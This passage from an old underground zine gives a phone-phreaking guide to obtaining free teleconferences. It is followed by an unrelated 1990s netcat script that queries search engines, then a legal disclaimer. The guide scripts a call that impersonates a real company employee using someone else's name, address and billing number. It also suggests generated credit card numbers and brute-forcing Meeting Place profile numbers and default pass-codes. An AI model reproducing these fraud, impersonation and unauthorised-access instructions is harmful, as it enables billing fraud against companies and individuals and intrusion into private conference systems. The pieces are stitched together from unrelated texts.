"Fuck off you running-dog capitalist pig I don't have to tell you anything". **Conferences** For spending hours talking to your geeky phrekin' mates you really need to start accessing conference systems. These are basically systems which join multiple lines together so all parties can speak to each other real-time. Those shite Partyline things are basically fucking expensive conferences (although now they are not allowed to even be real-time!). There are two general ways of accessing conferences. 1. Social Engineering/Carding This is a piece of piss. Ring up your directory enquiries or look on the Internet for teleconferencing numbers. A good way of accessing these things is to call the USA through one of your US-terminating out-dials. This allows you access to the many US based conferencing companies as well as hiding your phone number. You need some information before you call. Get some US names and addresses - check out the Internet. People often put such info. at the bottom of their newsgroup postings. The name, address, zip code and telephone number must match. Basically just ing them up and ask to set up a conference. The conversation will go something like this:- TC "Hello thank you for choosing XYX Teleconferencing Ltd, how may I help you?" You "Hi I would like to set up a conference please" TC "Sure when would you like it for?" You "in about 15 minutes" TC "How long for and for how many people sir?" You "4 hours and for twenty people please" TC "What is your company name, your name and address please" You "3M corporation, John Mackenzie, 1020 Slow St, Happy Valley. Minesota Zip code 12232" TC "Was that Mackintosh" - (how!?) You "No that MACKENZIE" TC "Sorry about that" You "No problem, it's a bad line" - probably because you're calling through 16 extenders! TC "And what's the billing number" You "that's 1-513-2344-3434" TC "Fine that has been set up - please dial 1-800-854-8554 to access your conference. The conference number will be 54334. What would you like for your pass-code?" You "Err 8232 please. Oh by the way, I have some people accessing the conference from the UK. What number do they need to dial?" TC "That will be 0800-756-3333" You "Thanks" Now you and your mates can call the relevant access numbers and enter the codes and get chatting. This works virtually every time with most of these companies - think about it, how the fuck are they supposed to find out who is vaild or not from that info. You can even get cheeky and use someone's account. Try calling AT&T teleconferencing and saying you are John Doe from some big company" Try anything you like. Remember they really don't know who you are. Some companies allow billing to a credit card. You can generate these pretty easily using CreditMaster and use them. This however does tend to carry a heavy penalty and also fucks over some poor unsuspecting member of the public (if that bothers you) Anyway there's no need. 2. Company Conferencing Systems Companies having realised how handy but expensive teleconferencing is have set up their own conference boxes. The most common one in the USA is Meeting Place. You will find these on the end of 0800 numbers or on extensions of Octel VM systems systems (try spelling MEETING into the directory to find the extension or just get scanning). They welcome you with "Welcome to Meeting Place. To attend a meeting press 1. To access your profile press 2 etc" What you need is a valid profile number. These a 3-17 digits but generally are between 4 and 6. You just have to keep trying until you find one. (There are default profiles on 0001, 0002 and 0003) The pass-code may be something like 123456. Once you are on these you can set up conferences when ever you like for loads of people. You can lock the session, form splinter sessions and boot people out like IRC. You don't need to know too much more as they are voice-prompt city. However there are some important features which stop you from getting noticed - the exact layout of Meeting place is in another text file, cryptically entitled "Phreaking Conferences with Meeting Place". See ya uV and Senor Cardini ************************************************** Shouts to Darkcyde Communications + Hy8rid + Public Nuisance + Nitrous Oxide #! /bin/sh ## Hit the major search engines. Hose the [large] output to a file! ## autoconverts multiple arguments into the right format for given servers -- ## usually worda+wordb, with certain lame exceptions like dejanews. ## Extracting and post-sorting the URLs is highly recommended... ## ## Altavista currently handled by a separate script; may merge at some point. ## ## _H* original 950824, updated 951218 and 960209 test "${1}" = "" && echo 'Needs argument[s] to search for!' && exit 1 PLUSARG="`echo $* | sed 's/ /+/g'`" PIPEARG="`echo ${PLUSARG} | sed 's/+/|/g'`" IFILE=/tmp/.webq.$$ # Don't have "nc"? Get "netcat" from avian.org and add it to your toolkit. doquery () { echo GET "$1" | nc -v -i 1 -w 30 "$2" "$3" } # changed since original: now supplying port numbers and separator lines... echo "=== Yahoo ===" doquery "/bin/search?p=${PLUSARG}&n=300&w=w&s=a" search.yahoo.com 80 echo '' ; echo "=== Webcrawler ===" doquery "/cgi-bin/WebQuery?searchText=${PLUSARG}&maxHits=300" webcrawler.com 80 # the infoseek lamers want "registration" before they do a real search, but... echo '' ; echo "=== Infoseek ===" echo " is broken." # doquery "WW/IS/Titles?qt=${PLUSARG}" www2.infoseek.com 80 # ... which doesn't work cuz their lame server wants the extra newlines, WITH # CRLF pairs ferkrissake. Fuck 'em for now, they're hopelessly broken. If # you want to play, the basic idea and query formats follow. # echo "GET /WW/IS/Titles?qt=${PLUSARG}" > $IFILE # echo "" >> $IFILE # nc -v -w 30 guide-p.infoseek.com 80 < $IFILE # this is kinda flakey; might have to do twice?? echo '' ; echo "=== Opentext ===" doquery "/omw/simplesearch?SearchFor=${PLUSARG}&mode=phrase" \ search.opentext.com 80 # looks like inktomi will only take hits=100, or defaults back to 30 # we try to suppress all the stupid rating dots here, too echo '' ; echo "=== Inktomi ===" doquery "/query/?query=${PLUSARG}&hits=100" ink3.cs.berkeley.edu 1234 | \ sed '/^$/d' #djnews lame shit limits hits to 120 and has nonstandard format echo '' ; echo "=== Dejanews ===" doquery "/cgi-bin/nph-dnquery?query=${PIPEARG}+maxhits=110+format=terse+defaultOp=AND" \ smithers.dejanews.com 80 # OLD lycos: used to work until they fucking BROKE it... # doquery "/cgi-bin/pursuit?query=${PLUSARG}&maxhits=300&terse=1" \ # query5.lycos.cs.cmu.edu 80 # NEW lycos: wants the User-agent field present in query or it returns nothing # 960206: webmaster@lycos duly bitched at # 960208: reply received; here's how we will now handle it: echo \ "GET /cgi-bin/pursuit?query=${PLUSARG}&maxhits=300&terse=terse&matchmode=and&minscore=.5 HTTP/1.x" \ > $IFILE echo "User-agent: *FUCK OFF*" >> $IFILE echo "Why: go ask todd@pointcom.com (Todd Whitney)" >> $IFILE echo '' >> $IFILE echo '' ; echo "=== Lycos ===" nc -v -i 1 -w 30 twelve.srv.lycos.com 80 < $IFILE rm -f $IFILE exit 0 # CURRENTLY BROKEN [?] # infoseek # some args need to be redone to ensure whatever "and" mode applies _______ _ _______ _ (_______) | (_______) | | _ | | _ ____ _____ ____ _ | | | | | || \ / _ ) | ___) | _ \ / || | | |_____| | | ( (/ / | |_____| | | ( (_| | \______)_| |_|\____) |_______)_| |_|\____| <*> Use this information at your own risk. Staff or contributors to Underground Periodical, nor the persons providing or hosting Underground Periodical, will NOT assume ANY responsibility for the use, misuse, or abuse, of any information provided herein. The previous information is provided for educational purposes ONLY. This information is NOT to be used for any illegal purposes whatsoever. <*> By reading Underground Periodical you ARE AGREEING to the following terms: I understand that using this information is illegal. I agree to, and understand, that I am responsible for my own actions. If I get into trouble using this information for the wrong reasons, I promise not to place the blame on Underground Periodical staff, contributors, or anyone that provided this issue or any other issue of Underground Periodical whether it were official or without notification. I understand that this information is for educational purposes only. Thanks for reading. :..::..End Of File..::..: